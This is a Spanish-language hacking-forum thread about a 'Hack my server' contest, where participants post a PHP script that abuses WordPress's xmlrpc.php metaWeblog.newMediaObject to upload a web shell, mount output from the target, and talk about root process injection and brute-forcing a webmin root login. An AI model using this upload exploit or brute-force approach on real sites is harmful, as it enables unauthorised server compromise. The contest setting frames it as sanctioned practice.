Autor
|
Tema: Hack my server II (Leído 87,194 veces)
|
dRak0
|
Bueno , voy a explicar algo que desconocia y que descubri buscando formas diferentes de subir shell. Luego de poder entrar via SQLi ya sea desde el wordpress o el phpmyadmin ,empeze a buscar otras formas. Leyendo el source de wordpress , encontre un archivo muy lindo llamado xmlrpc.php(No lo pongo porque no me deja poner mucho texto) Despues de leerlo todo , no lo podia creer lo servido que estaba. Observemos esta funcion: /* metaweblog.newMediaObject uploads a file, following your settings */ function mw_newMediaObject($args) { // adapted from a patch by Johann Richard // http://mycvs.org/archives/2004/06/30/file-upload-to-wordpress-in-ecto/ global $wpdb; $blog_ID = $wpdb->escape($args[0]); $user_login = $wpdb->escape($args[1]); $user_pass = $wpdb->escape($args[2]); $data = $args[3]; $name = $data['name']; $type = $data['type']; $bits = $data['bits']; logIO ('O', '(MW) Received '.strlen($bits).' bytes'); if ( !$this->login_pass_ok($user_login, $user_pass) ) return $this->error; set_current_user(0, $user_login); if ( !current_user_can('upload_files') ) { logIO('O', '(MW) User does not have upload_files capability'); $this->error = new IXR_Error(401, 'You are not allowed to upload files to this site.'); return $this->error; } $upload = wp_upload_bits($name, $type, $bits); if ( ! empty($upload['error']) ) { logIO('O', '(MW) Could not write file '.$name); return new IXR_Error(500, 'Could not write file '.$name); } return array('url' => $upload['url']); }
Sisi muchachos , hace un upload! Entonces simplemente creo un exploit... <?php include_once("class-IXR.php"); echo "Exploit para concurso de elhacker.net"; $cliente=new IXR_CLIENT('http://IP/xmlrpc.php'); $archivo=fopen('shell.php','rb'); $data=fread($archivo,$tamano); 'name'=>"shell.php", 'type'=>"application/php", 'bits'=>new IXR_Base64($data) ); $cliente->query('metaWeblog.newMediaObject',array( 0, "ret2libc", "password", $shell )); echo "Check bitch!"; ?>
Class-IXR.php lo pueden encontrar en wordpress. No lo voy a postear. Bueno , aprendi algo nuevo y lo comparto.Y encima repase algo de php que estaba bastante oxidado.
|
|
« Última modificación: 3 Agosto 2014, 04:37 am por ret2libc »
|
En línea
|
|
|
|
dRak0
|
/vz/vms/84472/private on / type simfs (rw,relatime) proc on /proc type proc (rw,relatime) sysfs on /sys type sysfs (rw,relatime) none on /dev/pts type devpts (rw,nosuid,noexec,relatime,mode=600,ptmxmode=000) none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,nosuid,nodev,noexec,relatime) none on /sys/fs/cgroup type tmpfs (rw,relatime,size=4k,mode=755) none on /run type tmpfs (rw,nosuid,noexec,relatime,size=104860k,mode=755) none on /dev/shm type tmpfs (rw,relatime) none on /run/lock type tmpfs (rw,nosuid,nodev,noexec,relatime,size=5120k) none on /run/shm type tmpfs (rw,nosuid,nodev,relatime) none on /run/user type tmpfs (rw,nosuid,nodev,noexec,relatime,size=102400k,mode=755)
|
|
|
En línea
|
|
|
|
MinusFour
|
/vz/vms/84472/private on / type simfs (rw,relatime) proc on /proc type proc (rw,relatime) sysfs on /sys type sysfs (rw,relatime) none on /dev/pts type devpts (rw,nosuid,noexec,relatime,mode=600,ptmxmode=000) none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,nosuid,nodev,noexec,relatime) none on /sys/fs/cgroup type tmpfs (rw,relatime,size=4k,mode=755) none on /run type tmpfs (rw,nosuid,noexec,relatime,size=104860k,mode=755) none on /dev/shm type tmpfs (rw,relatime) none on /run/lock type tmpfs (rw,nosuid,nodev,noexec,relatime,size=5120k) none on /run/shm type tmpfs (rw,nosuid,nodev,relatime) none on /run/user type tmpfs (rw,nosuid,nodev,noexec,relatime,size=102400k,mode=755)
:O Me parece que esto explica porque uname -a nos devuelve que es Red Hat XD.
|
|
|
En línea
|
|
|
|
dRak0
|
Pregunta : ¿Hay alguna forma de crear un hilo en un proceso remoto como en windows?Me refiero a CreateRemoteThread() . Tratar de escribir en un proceso remoto que sea root y ejecutar un createremotethread desde el lugar que escribimos en ese proceso remoto y asi ejecutar una shellcode.
Esto lo hize en windows , no tengo idea si se puede en GNU/Linux.
|
|
|
En línea
|
|
|
|
MinusFour
|
Pregunta : ¿Hay alguna forma de crear un hilo en un proceso remoto como en windows?Me refiero a CreateRemoteThread() . Tratar de escribir en un proceso remoto que sea root y ejecutar un createremotethread desde el lugar que escribimos en ese proceso remoto y asi ejecutar una shellcode.
Esto lo hize en windows , no tengo idea si se puede en GNU/Linux.
Después de 25 minutos de Jugaad, parece que no. https://www.youtube.com/watch?v=Nm5htFWAVUEVaya, si puedes inyectar código en procesos que son tuyos a través de ptrace() pero no puedes inyectar a un proceso del root. Y también tiene que estar habilitado en el kernel (en la conferencia, mencionan que ubuntu lo tiene desactivado desde la 10.04 en adelante).
|
|
|
En línea
|
|
|
|
Baal_30
Desconectado
Mensajes: 248
|
Veo que hemos llegado a un punto muerto, no ¿? :/
Yo sigo mirando el tema, pero uff tengo tanto por aprender!
|
|
|
En línea
|
«La suerte es el cuidado de los detalles». -Winston Churchill
|
|
|
xustyx
Desconectado
Mensajes: 213
|
Eso parece... En parte creo que x los permisos de webmin ... Que alguien modifico.
|
|
|
En línea
|
|
|
|
|
MinusFour
|
Lo que pasa es que está usando un sistema virtualizado, OVH aquí está usando OpenVz (hay otros sistemas en OVH). Si te das cuenta en el /proc/mounts aparece la ruta del disco duro del sistema virtualizado en el host. Lo ha puesto ret2libc. http://en.wikipedia.org/wiki/OpenVZEncontre un exploit que podría funcionar, salio hace un mes, el problema es que necesito compilarlo ahí en el host xD y otros pequeños detalles también. Voy a intentar a hacer brute force al webmin con root a ver si tiene una contraseña débil. Edit: Error - Access denied for x.x.x.x. The host has been blocked because of too many authentication failures. NOUP.
|
|
« Última modificación: 4 Agosto 2014, 02:22 am por MinusFour »
|
En línea
|
|
|
|
#!drvy
|
Hmm cierto, no me había fijado en el post ..
Saludos
|
|
|
En línea
|
|
|
|
|
Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
Counter Strike 1.5 Hack Server
Juegos y Consolas
|
*StoW*
|
0
|
3,679
|
19 Octubre 2006, 22:22 pm
por *StoW*
|
|
|
Internal Server Error(hack web cross)
WarZone
|
Angbroda
|
5
|
6,399
|
3 Marzo 2009, 17:39 pm
por © Shadoweps ツ
|
|
|
Torneo Hack my Server
« 1 2 ... 6 7 »
Foro Libre
|
dimitrix
|
62
|
23,122
|
1 Agosto 2014, 03:04 am
por dimitrix
|
|
|
Hack My Server III
« 1 2 »
Foro Libre
|
dimitrix
|
16
|
6,636
|
30 Marzo 2015, 18:47 pm
por elmatador2
|
|
|
Hack my server 2018
« 1 2 »
Hacking
|
dimitrix
|
16
|
19,762
|
28 Mayo 2018, 22:06 pm
por hitori batusai
|
|